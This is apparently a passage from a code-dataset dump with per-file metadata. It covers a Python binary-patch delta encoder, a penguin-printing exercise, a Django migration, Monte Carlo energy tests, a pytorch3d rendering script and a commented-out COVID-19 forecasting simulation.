blockend = targetEncodingOffset + blocksize
block = target[targetEncodingOffset:blockend]
for sourceOffset in sourcemap.get_block(block):
backspan, forespan = measure_op(
source, sourceOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
if sourceOffset == targetEncodingOffset:
candidate = ops.SourceRead(backspan+forespan)
else:
candidate = ops.SourceCopy(
backspan+forespan,
sourceOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
for targetOffset in targetmap.get_block(block):
backspan, forespan = measure_op(
target, targetOffset,
target, targetEncodingOffset,
)
if forespan == 0:
# This block actually doesn't occur at this sourceOffset after
# all. Perhaps it's a hash collision?
continue
candidate = ops.TargetCopy(
backspan+forespan,
targetOffset-backspan,
)
lastSourceCopyOffset, lastTargetCopyOffset = (
opbuf.copy_offsets(backspan)
)
efficiency = candidate.efficiency(
lastSourceCopyOffset, lastTargetCopyOffset)
if efficiency > bestOpEfficiency:
bestOp = candidate
bestOpEfficiency = efficiency
bestOpBackSpan = backspan
bestOpForeSpan = forespan
# If we can't find a copy instruction that encodes this block, or the
# best one we've found is a net efficiency loss, we'll have to issue
# a TargetRead... later.
if bestOp is None or bestOpEfficiency < 1.0:
targetEncodingOffset += 1
continue
# We found an encoding for the target block, so issue a TargetRead for
# all the bytes from the end of the last block up to now.
if targetWriteOffset < targetEncodingOffset:
tr = ops.TargetRead(target[targetWriteOffset:targetEncodingOffset])
opbuf.append(tr)
targetWriteOffset = targetEncodingOffset
opbuf.append(bestOp, rollback=bestOpBackSpan)
targetWriteOffset += bestOpForeSpan
# The next block we want to encode starts after the bytes we've
# just written.
targetEncodingOffset = targetWriteOffset
# If it's been more than BLOCKSIZE bytes since we added a block to
# targetmap, process the backlog.
while (targetWriteOffset - nextTargetMapBlockOffset) >= blocksize:
newblock, offset = next(targetblocks)
targetmap.add_block(newblock, offset)
nextTargetMapBlockOffset = offset + len(newblock)
for op in opbuf:
yield op
if targetWriteOffset < len(target):
# It's TargetRead all the way up to the end of the file.
yield ops.TargetRead(target[targetWriteOffset:])
yield ops.SourceCRC32(crc32(source))
yield ops.TargetCRC32(crc32(target))
| en | 0.896223 | # This program is free software. It comes without any warranty, to # the extent permitted by applicable law. You can redistribute it # and/or modify it under the terms of the Do What The Fuck You Want # To Public License, Version 2, as published by Sam Hocevar. See # the COPYING file included with this distribution or # http://sam.zoy.org/wtfpl/COPYING for more details. Tools for creating BPS patches. For more information about the basic algorithm used here, see the article "Intro to Delta Encoding": https://gitorious.org/python-blip/pages/IntroToDeltaEncoding Measure the match between blocksrc and target at these offsets. # The various parameters line up something like this: # # v-- sourceoffset # ...ABCDExGHI... <-- blocksrc # # ...xxxABCDEF... <-- target # ^-- targetOffset # # result: backspan = 2, forespan = 3 # # Measure how far back the source and target files match from these # offsets. # We need the +1 here because the test inside the loop is actually looking # at the byte *before* the one pointed to by (sourceoffset-backspan), so # we need our span to stretch that little bit further. # Measure how far forward the source and target files are aligned. # We matched right up to the end of the file. Yield a sequence of patch operations that transform source to target. # We assume the entire source file will be available when applying this # patch, so load the entire thing into the block map. # Points at the next byte of the target buffer that needs to be encoded. # Points at the next byte of the target buffer we're searching for # encodings for. If we can't find an encoding for a particular byte, we'll # leave targetWriteOffset alone and increment this offset, on the off # chance that we find a new encoding that we can extend backwards to # targetWriteOffset. # Keep track of blocks seen in the part of the target buffer before # targetWriteOffset. Because targetWriteOffset does not always advance by # an even multiple of the blocksize, there can be some lag between when # targetWriteOffset moves past a particular byte, and when that byte's # block is added to targetmap. # Points to the byte just beyond the most recent block added to targetmap; # the difference between this and targetWriteOffset measures the 'some lag' # described above. # A place to store operations before we spit them out. This gives us an # opportunity to replace operations if we later come across a better # alternative encoding. # Keeps track of the most efficient operation for encoding this # particular offset that we've found so far. # This block actually doesn't occur at this sourceOffset after # all. Perhaps it's a hash collision? # This block actually doesn't occur at this sourceOffset after # all. Perhaps it's a hash collision? # If we can't find a copy instruction that encodes this block, or the # best one we've found is a net efficiency loss, we'll have to issue # a TargetRead... later. # We found an encoding for the target block, so issue a TargetRead for # all the bytes from the end of the last block up to now. # The next block we want to encode starts after the bytes we've # just written. # If it's been more than BLOCKSIZE bytes since we added a block to # targetmap, process the backlog. # It's TargetRead all the way up to the end of the file. | 2.480039 | 2 |
Week_1/ex2.py | babosina/Coursera-Python-HSE | 0 | 6616694 | <gh_stars>0
"""
Напишите программу, которая по данному числу N от 1 до 9 выводит на экран N пингвинов.
Изображение одного пингвина имеет размер 5×9 символов, между двумя соседними пингвинами также имеется пустой (из пробелов) столбец.
Разрешается вывести пустой столбец после последнего пингвина.
"""
number = int(input())
print(' _~_ ' * number, ' ' * number, end=' \n')
print(' (o o) ' * number, end=' \n')
print(' / V \\ ' * number, end=' \n')
print('/( _ )\\ ' * number, end=' \n')
print(' ^^ ^^ ' * number, end=' ')
| """
Напишите программу, которая по данному числу N от 1 до 9 выводит на экран N пингвинов.
Изображение одного пингвина имеет размер 5×9 символов, между двумя соседними пингвинами также имеется пустой (из пробелов) столбец.
Разрешается вывести пустой столбец после последнего пингвина.
"""
number = int(input())
print(' _~_ ' * number, ' ' * number, end=' \n')
print(' (o o) ' * number, end=' \n')
print(' / V \\ ' * number, end=' \n')
print('/( _ )\\ ' * number, end=' \n')
print(' ^^ ^^ ' * number, end=' ') | ru | 0.995358 | Напишите программу, которая по данному числу N от 1 до 9 выводит на экран N пингвинов. Изображение одного пингвина имеет размер 5×9 символов, между двумя соседними пингвинами также имеется пустой (из пробелов) столбец. Разрешается вывести пустой столбец после последнего пингвина. | 4.344246 | 4 |
scieio/sellers/migrations/0004_auto_20200418_0002.py | arnelimperial/scieio | 0 | 6616695 | # Generated by Django 3.0.5 on 2020-04-17 21:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sellers', '0003_auto_20200417_2352'),
]
operations = [
migrations.AlterField(
model_name='seller',
name='return_policy',
field=models.TextField(default='No Return Policy Listed'),
),
migrations.AlterField(
model_name='seller',
name='shipping_policy',
field=models.TextField(default='No Shipping Policy Listed'),
),
]
| # Generated by Django 3.0.5 on 2020-04-17 21:02
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('sellers', '0003_auto_20200417_2352'),
]
operations = [
migrations.AlterField(
model_name='seller',
name='return_policy',
field=models.TextField(default='No Return Policy Listed'),
),
migrations.AlterField(
model_name='seller',
name='shipping_policy',
field=models.TextField(default='No Shipping Policy Listed'),
),
]
| en | 0.792457 | # Generated by Django 3.0.5 on 2020-04-17 21:02 | 1.495492 | 1 |
group_project/vinnyharris-day5-hw/mc-package/mcsim/tests/test_mc.py | msse-2021-bootcamp/team2-project | 0 | 6616696 | """
Test for mcsim package - monte carlo module.
"""
import math
import mcsim.monte_carlo as mc
def test_calculate_distance_1():
"""
Test calculate distance function
"""
point1=[0,0,0]
point2=[0,1,0]
expected = 1
observed = mc.calculate_distance(point1,point2)
assert math.isclose(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_2():
"""
Test periodic boundary condition for calculate distance function
"""
point1=[0,0,0]
point2=[0,0,8]
box_length = 10
expected = 2
observed = mc.calculate_distance(point1,point2,box_length)
assert expected == observed
def test_calculate_LJ_1():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(1) == 0
def test_calculate_LJ_2():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]]
assert mc.calculate_total_energy(coordinates, 10, 3.0) == -2.031005859375
def test_calculate_total_energy_1():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 1, 10, 3) == -2
def test_calculate_total_energy_2():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 3) == mc.calculate_pair_energy(coordinates, 2, 10, 3)
def test_calculate_total_energy_3():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 2) == -1
| """
Test for mcsim package - monte carlo module.
"""
import math
import mcsim.monte_carlo as mc
def test_calculate_distance_1():
"""
Test calculate distance function
"""
point1=[0,0,0]
point2=[0,1,0]
expected = 1
observed = mc.calculate_distance(point1,point2)
assert math.isclose(expected, observed)
# write a test for the calculate distance function which tests for the periodic boundary conditions
def test_calculate_distance_2():
"""
Test periodic boundary condition for calculate distance function
"""
point1=[0,0,0]
point2=[0,0,8]
box_length = 10
expected = 2
observed = mc.calculate_distance(point1,point2,box_length)
assert expected == observed
def test_calculate_LJ_1():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(1) == 0
def test_calculate_LJ_2():
"""
Test the Lennard Jones pair energy
"""
assert mc.calculate_LJ(math.pow(2, (1/6))) == -1.0
def test_calculate_total_energy():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, math.pow(2, 1/6), 0], [0, 2*math.pow(2, 1/6), 0]]
assert mc.calculate_total_energy(coordinates, 10, 3.0) == -2.031005859375
def test_calculate_total_energy_1():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 1, 10, 3) == -2
def test_calculate_total_energy_2():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 3) == mc.calculate_pair_energy(coordinates, 2, 10, 3)
def test_calculate_total_energy_3():
"""
Test calculating the total energy
"""
coordinates = [[0, 0, 0], [0, 0, 2**(1/6)], [0, 0, 2*(2**(1/6))]]
assert mc.calculate_pair_energy(coordinates, 0, 10, 2) == -1
| en | 0.627805 | Test for mcsim package - monte carlo module. Test calculate distance function # write a test for the calculate distance function which tests for the periodic boundary conditions Test periodic boundary condition for calculate distance function Test the Lennard Jones pair energy Test the Lennard Jones pair energy Test calculating the total energy Test calculating the total energy Test calculating the total energy Test calculating the total energy | 3.597975 | 4 |
2018-02/2018-02-04/get_infor.py | wenjuanchendora/Python_Study | 0 | 6616697 | import selenium
import sys
print(selenium.__version__)
print(sys.platform) | import selenium
import sys
print(selenium.__version__)
print(sys.platform) | none | 1 | 1.49398 | 1 | |
fantasydota/util/random_function.py | open-fantasy-league/fantasy-dota-heroes | 3 | 6616698 | import calendar
import datetime
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
year = int(sourcedate.year + month / 12 )
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year,month)[1])
return datetime.date(year,month,day)
def bprint(boring_string):
print "-_______---___-----_---_---_-__--_-------_--__---_--_-__--__-"
print boring_string
print "---___--__--_--_--__--_---------___---_----_---_--_---__---_--__--"
| import calendar
import datetime
def add_months(sourcedate,months):
month = sourcedate.month - 1 + months
year = int(sourcedate.year + month / 12 )
month = month % 12 + 1
day = min(sourcedate.day,calendar.monthrange(year,month)[1])
return datetime.date(year,month,day)
def bprint(boring_string):
print "-_______---___-----_---_---_-__--_-------_--__---_--_-__--__-"
print boring_string
print "---___--__--_--_--__--_---------___---_----_---_--_---__---_--__--"
| none | 1 | 3.734083 | 4 | |
apps/RenderMeshes/main.py | sanjeevmk/Woodhouse | 0 | 6616699 | import argparse
from input_representation import mesh
from renderer.cameras import Camera
from renderer.rasterizer import Rasterizer
from renderer.lights import Lights
from renderer.shaders.basic_shader import Shader
from pytorch3d.renderer import MeshRenderer
from PIL import Image
def main(args):
mesh_path = args.mesh_path
mesh_instance = mesh.TriangleMesh(mesh_path=mesh_path)
mesh_instance.load_pytorch_mesh_from_file()
camera_instance = Camera()
camera_instance.lookAt(args.dist, args.elev, args.azim)
light_instance = Lights()
light_instance.setup_light([args.light_x, args.light_y, args.light_z])
rasterizer_instance = Rasterizer()
rasterizer_instance.init_rasterizer(camera_instance.camera)
shader_instance = Shader()
shader_instance.setup_shader(camera_instance.camera, light_instance.light)
renderer_instance = MeshRenderer(rasterizer=rasterizer_instance.rasterizer, shader=shader_instance.shader)
images = renderer_instance(mesh_instance.pytorch_mesh)
np_image = images[0].cpu().detach().numpy()*255.0
np_image = np_image.astype('uint8')
pil_image = Image.fromarray(np_image)
pil_image.save(args.out_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--mesh-path", help="Path to the mesh file")
parser.add_argument("--dist", type=float, help="Camera Distance")
parser.add_argument("--elev", type=float, help="Camera Elevation")
parser.add_argument("--azim", type=float, help="Camera Azimuth")
parser.add_argument("--light-x", type=float, help="Light X")
parser.add_argument("--light-y", type=float, help="Light Y")
parser.add_argument("--light-z", type=float, help="Light Z")
parser.add_argument("--out-path", help="Path to the output image")
args = parser.parse_args()
main(args)
| import argparse
from input_representation import mesh
from renderer.cameras import Camera
from renderer.rasterizer import Rasterizer
from renderer.lights import Lights
from renderer.shaders.basic_shader import Shader
from pytorch3d.renderer import MeshRenderer
from PIL import Image
def main(args):
mesh_path = args.mesh_path
mesh_instance = mesh.TriangleMesh(mesh_path=mesh_path)
mesh_instance.load_pytorch_mesh_from_file()
camera_instance = Camera()
camera_instance.lookAt(args.dist, args.elev, args.azim)
light_instance = Lights()
light_instance.setup_light([args.light_x, args.light_y, args.light_z])
rasterizer_instance = Rasterizer()
rasterizer_instance.init_rasterizer(camera_instance.camera)
shader_instance = Shader()
shader_instance.setup_shader(camera_instance.camera, light_instance.light)
renderer_instance = MeshRenderer(rasterizer=rasterizer_instance.rasterizer, shader=shader_instance.shader)
images = renderer_instance(mesh_instance.pytorch_mesh)
np_image = images[0].cpu().detach().numpy()*255.0
np_image = np_image.astype('uint8')
pil_image = Image.fromarray(np_image)
pil_image.save(args.out_path)
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("--mesh-path", help="Path to the mesh file")
parser.add_argument("--dist", type=float, help="Camera Distance")
parser.add_argument("--elev", type=float, help="Camera Elevation")
parser.add_argument("--azim", type=float, help="Camera Azimuth")
parser.add_argument("--light-x", type=float, help="Light X")
parser.add_argument("--light-y", type=float, help="Light Y")
parser.add_argument("--light-z", type=float, help="Light Z")
parser.add_argument("--out-path", help="Path to the output image")
args = parser.parse_args()
main(args)
| none | 1 | 2.475484 | 2 | |
run_sim.py | tdennisliu/covid19-forecasting-aus | 7 | 6616700 | <gh_stars>1-10
# This method of running simulations is deprecated in favour of run_state.py
# from sim_class import *
# import pandas as pd
# from sys import argv
# from numpy.random import beta, gamma
# #from joblib import Parallel, delayed
# import multiprocessing as mp
# def worker(arg):
# obj, methname = arg[:2]
# return getattr(obj,methname)(*arg[2:])
# n_sims=int(argv[1]) #number of sims
# time_end = int(argv[2])
# states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT']
# #states = ['QLD','VIC']
# start_date = '2020-03-01'
# case_file_date = ['06Jul','0915']
# forecast_date = '2020-07-06'
# R_I='R_I'
# abc =False
# if R_I is not None:
# print("Using model output for R_L and R_I")
# local_detection = {
# 'NSW':0.5,#0.556,#0.65,
# 'QLD':0.4,#0.353,#0.493,#0.74,
# 'SA':0.38,#0.597,#0.75,
# 'TAS':0.3,#0.598,#0.48,
# 'VIC':0.56,#0.558,#0.77,
# 'WA':0.38,#0.409,#0.509,#0.66,
# 'ACT':0.8,#0.557,#0.65,
# 'NT':0.8,#0.555,#0.71
# }
# a_local_detection = {
# 'NSW':0.1,#0.556,#0.65,
# 'QLD':0.05,#0.353,#0.493,#0.74,
# 'SA':0.05,#0.597,#0.75,
# 'TAS':0.05,#0.598,#0.48,
# 'VIC':0.13,#0.558,#0.77,
# 'WA':0.05,#0.409,#0.509,#0.66,
# 'ACT':0.2,#0.557,#0.65,
# 'NT':0.2,#0.555,#0.71
# }
# qi_d = {
# 'NSW':0.95,#0.758,
# 'QLD':0.95,#0.801,
# 'SA':0.95,#0.792,
# 'TAS':0.95,#0.800,
# 'VIC':0.95,#0.735,
# 'WA':0.95,#0.792,
# 'ACT':0.95,#0.771,
# 'NT':0.95,#0.761
# }
# ##Initialise the number of cases as 1st of March data incidence
# current = {
# 'ACT':[0,0,0],
# 'NSW':[10,0,2], #1
# 'NT':[0,0,0],
# 'QLD':[2,0,0],
# 'SA':[2,0,0],
# 'TAS':[0,0,0],
# 'VIC':[2,0,0], #1
# 'WA':[0,0,0],
# }
# if len(argv)>=3:
# forecast_type = argv[3]
# else:
# forecast_type = None
# forecast_dict = {}
# for state in states:
# initial_people = ['I']*current[state][0] + \
# ['A']*current[state][1] + \
# ['S']*current[state][2]
# people = {}
# if abc:
# #qs_prior = beta(10,10,size=10000)
# #qi_prior = beta(17, 3, size=10000)
# #qa_prior = beta(3,7, size=10000)
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000)))
# ps_prior = beta(10,10,size=1000)
# else:
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =[1/2]
# ps_prior = 0.2
# ps_prior= [ps_prior]
# for i,cat in enumerate(initial_people):
# people[i] = Person(0,0,0,0,cat)
# if state in ['VIC']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['NSW']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['ACT','NT']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# else:
# forecast_dict[state] = Forecast(current[state],state,
# start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date,
# cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# if __name__ =="__main__":
# for key,item in forecast_dict.items():
# item.read_in_Reff()
# pool = mp.Pool(8)
# l_df_results =pool.map(worker,
# [(obj,'simulate_many',time_end, n_sims)
# for key,obj in forecast_dict.items()]
# )
# pool.close()
# pool.join()
# #record quantiles in separate file
# dic_states={
# 'state':[],
# 'date':[],
# 'type':[],
# 'bottom':[],
# 'lower':[],
# 'median':[],
# 'upper':[],
# 'top':[],
# }
# dates =pd.date_range(start = start_date,
# periods=time_end #num of days
# )
# vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs']
# for var in vars_l:
# for state,df in l_df_results:
# df = df[[col.strftime('%Y-%m-%d') for
# col in dates]]
# quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0)
# dic_states['state'].extend([state]*len(dates))
# dic_states['date'].extend(df.columns)
# dic_states['type'].extend([var]*len(dates))
# dic_states['bottom'].extend(quantiles.loc[0.05])
# dic_states['lower'].extend(quantiles.loc[0.25])
# dic_states['median'].extend(quantiles.loc[0.50])
# dic_states['upper'].extend(quantiles.loc[0.75])
# dic_states['top'].extend(quantiles.loc[0.95])
# plots =pd.DataFrame.from_dict(dic_states)
# plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet")
| # This method of running simulations is deprecated in favour of run_state.py
# from sim_class import *
# import pandas as pd
# from sys import argv
# from numpy.random import beta, gamma
# #from joblib import Parallel, delayed
# import multiprocessing as mp
# def worker(arg):
# obj, methname = arg[:2]
# return getattr(obj,methname)(*arg[2:])
# n_sims=int(argv[1]) #number of sims
# time_end = int(argv[2])
# states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT']
# #states = ['QLD','VIC']
# start_date = '2020-03-01'
# case_file_date = ['06Jul','0915']
# forecast_date = '2020-07-06'
# R_I='R_I'
# abc =False
# if R_I is not None:
# print("Using model output for R_L and R_I")
# local_detection = {
# 'NSW':0.5,#0.556,#0.65,
# 'QLD':0.4,#0.353,#0.493,#0.74,
# 'SA':0.38,#0.597,#0.75,
# 'TAS':0.3,#0.598,#0.48,
# 'VIC':0.56,#0.558,#0.77,
# 'WA':0.38,#0.409,#0.509,#0.66,
# 'ACT':0.8,#0.557,#0.65,
# 'NT':0.8,#0.555,#0.71
# }
# a_local_detection = {
# 'NSW':0.1,#0.556,#0.65,
# 'QLD':0.05,#0.353,#0.493,#0.74,
# 'SA':0.05,#0.597,#0.75,
# 'TAS':0.05,#0.598,#0.48,
# 'VIC':0.13,#0.558,#0.77,
# 'WA':0.05,#0.409,#0.509,#0.66,
# 'ACT':0.2,#0.557,#0.65,
# 'NT':0.2,#0.555,#0.71
# }
# qi_d = {
# 'NSW':0.95,#0.758,
# 'QLD':0.95,#0.801,
# 'SA':0.95,#0.792,
# 'TAS':0.95,#0.800,
# 'VIC':0.95,#0.735,
# 'WA':0.95,#0.792,
# 'ACT':0.95,#0.771,
# 'NT':0.95,#0.761
# }
# ##Initialise the number of cases as 1st of March data incidence
# current = {
# 'ACT':[0,0,0],
# 'NSW':[10,0,2], #1
# 'NT':[0,0,0],
# 'QLD':[2,0,0],
# 'SA':[2,0,0],
# 'TAS':[0,0,0],
# 'VIC':[2,0,0], #1
# 'WA':[0,0,0],
# }
# if len(argv)>=3:
# forecast_type = argv[3]
# else:
# forecast_type = None
# forecast_dict = {}
# for state in states:
# initial_people = ['I']*current[state][0] + \
# ['A']*current[state][1] + \
# ['S']*current[state][2]
# people = {}
# if abc:
# #qs_prior = beta(10,10,size=10000)
# #qi_prior = beta(17, 3, size=10000)
# #qa_prior = beta(3,7, size=10000)
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000)))
# ps_prior = beta(10,10,size=1000)
# else:
# qi_prior = [qi_d[state]]
# qs_prior = [local_detection[state]]
# qa_prior = [a_local_detection[state]]
# gam =[1/2]
# ps_prior = 0.2
# ps_prior= [ps_prior]
# for i,cat in enumerate(initial_people):
# people[i] = Person(0,0,0,0,cat)
# if state in ['VIC']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['NSW']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 1, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# elif state in ['ACT','NT']:
# forecast_dict[state] = Forecast(current[state],
# state,start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date,
# cross_border_state=None,cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# else:
# forecast_dict[state] = Forecast(current[state],state,
# start_date,people,
# alpha_i= 0.5, k =0.1,gam_list=gam,
# qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior,
# qua_ai=1,qua_qi_factor=1,qua_qs_factor=1,
# forecast_R = forecast_type , R_I = R_I,forecast_date=forecast_date,
# cases_file_date=case_file_date,
# ps_list = ps_prior,
# )
# if __name__ =="__main__":
# for key,item in forecast_dict.items():
# item.read_in_Reff()
# pool = mp.Pool(8)
# l_df_results =pool.map(worker,
# [(obj,'simulate_many',time_end, n_sims)
# for key,obj in forecast_dict.items()]
# )
# pool.close()
# pool.join()
# #record quantiles in separate file
# dic_states={
# 'state':[],
# 'date':[],
# 'type':[],
# 'bottom':[],
# 'lower':[],
# 'median':[],
# 'upper':[],
# 'top':[],
# }
# dates =pd.date_range(start = start_date,
# periods=time_end #num of days
# )
# vars_l = ['symp_inci_obs','imports_inci_obs','asymp_inci_obs','symp_inci','asymp_inci','imports_inci','total_inci','total_inci_obs']
# for var in vars_l:
# for state,df in l_df_results:
# df = df[[col.strftime('%Y-%m-%d') for
# col in dates]]
# quantiles = df.loc[var].quantile([0.05,0.25,0.5,0.75,0.95],axis=0)
# dic_states['state'].extend([state]*len(dates))
# dic_states['date'].extend(df.columns)
# dic_states['type'].extend([var]*len(dates))
# dic_states['bottom'].extend(quantiles.loc[0.05])
# dic_states['lower'].extend(quantiles.loc[0.25])
# dic_states['median'].extend(quantiles.loc[0.50])
# dic_states['upper'].extend(quantiles.loc[0.75])
# dic_states['top'].extend(quantiles.loc[0.95])
# plots =pd.DataFrame.from_dict(dic_states)
# plots.to_parquet('./results/quantiles'+forecast_type+start_date+"sim_"+str(n_sims)+"days_"+str(time_end)+".parquet") | en | 0.528404 | # This method of running simulations is deprecated in favour of run_state.py # from sim_class import * # import pandas as pd # from sys import argv # from numpy.random import beta, gamma # #from joblib import Parallel, delayed # import multiprocessing as mp # def worker(arg): # obj, methname = arg[:2] # return getattr(obj,methname)(*arg[2:]) # n_sims=int(argv[1]) #number of sims # time_end = int(argv[2]) # states = ['NSW','QLD','SA','TAS','VIC','WA','ACT','NT'] # #states = ['QLD','VIC'] # start_date = '2020-03-01' # case_file_date = ['06Jul','0915'] # forecast_date = '2020-07-06' # R_I='R_I' # abc =False # if R_I is not None: # print("Using model output for R_L and R_I") # local_detection = { # 'NSW':0.5,#0.556,#0.65, # 'QLD':0.4,#0.353,#0.493,#0.74, # 'SA':0.38,#0.597,#0.75, # 'TAS':0.3,#0.598,#0.48, # 'VIC':0.56,#0.558,#0.77, # 'WA':0.38,#0.409,#0.509,#0.66, # 'ACT':0.8,#0.557,#0.65, # 'NT':0.8,#0.555,#0.71 # } # a_local_detection = { # 'NSW':0.1,#0.556,#0.65, # 'QLD':0.05,#0.353,#0.493,#0.74, # 'SA':0.05,#0.597,#0.75, # 'TAS':0.05,#0.598,#0.48, # 'VIC':0.13,#0.558,#0.77, # 'WA':0.05,#0.409,#0.509,#0.66, # 'ACT':0.2,#0.557,#0.65, # 'NT':0.2,#0.555,#0.71 # } # qi_d = { # 'NSW':0.95,#0.758, # 'QLD':0.95,#0.801, # 'SA':0.95,#0.792, # 'TAS':0.95,#0.800, # 'VIC':0.95,#0.735, # 'WA':0.95,#0.792, # 'ACT':0.95,#0.771, # 'NT':0.95,#0.761 # } # ##Initialise the number of cases as 1st of March data incidence # current = { # 'ACT':[0,0,0], # 'NSW':[10,0,2], #1 # 'NT':[0,0,0], # 'QLD':[2,0,0], # 'SA':[2,0,0], # 'TAS':[0,0,0], # 'VIC':[2,0,0], #1 # 'WA':[0,0,0], # } # if len(argv)>=3: # forecast_type = argv[3] # else: # forecast_type = None # forecast_dict = {} # for state in states: # initial_people = ['I']*current[state][0] + \ # ['A']*current[state][1] + \ # ['S']*current[state][2] # people = {} # if abc: # #qs_prior = beta(10,10,size=10000) # #qi_prior = beta(17, 3, size=10000) # #qa_prior = beta(3,7, size=10000) # qi_prior = [qi_d[state]] # qs_prior = [local_detection[state]] # qa_prior = [a_local_detection[state]] # gam =np.maximum(0.1,np.minimum(2,gamma(4,0.25, size=1000))) # ps_prior = beta(10,10,size=1000) # else: # qi_prior = [qi_d[state]] # qs_prior = [local_detection[state]] # qa_prior = [a_local_detection[state]] # gam =[1/2] # ps_prior = 0.2 # ps_prior= [ps_prior] # for i,cat in enumerate(initial_people): # people[i] = Person(0,0,0,0,cat) # if state in ['VIC']: # forecast_dict[state] = Forecast(current[state], # state,start_date,people, # alpha_i= 1, k =0.1,gam_list=gam, # qs_list=qs_prior,qi_list=qi_prior,qa_list=qa_prior, # qua_ai=1,qua_qi_factor=1,qua_qs_factor=1, # forecast_R =forecast_type, R_I = R_I,forecast_date=forecast_date, # 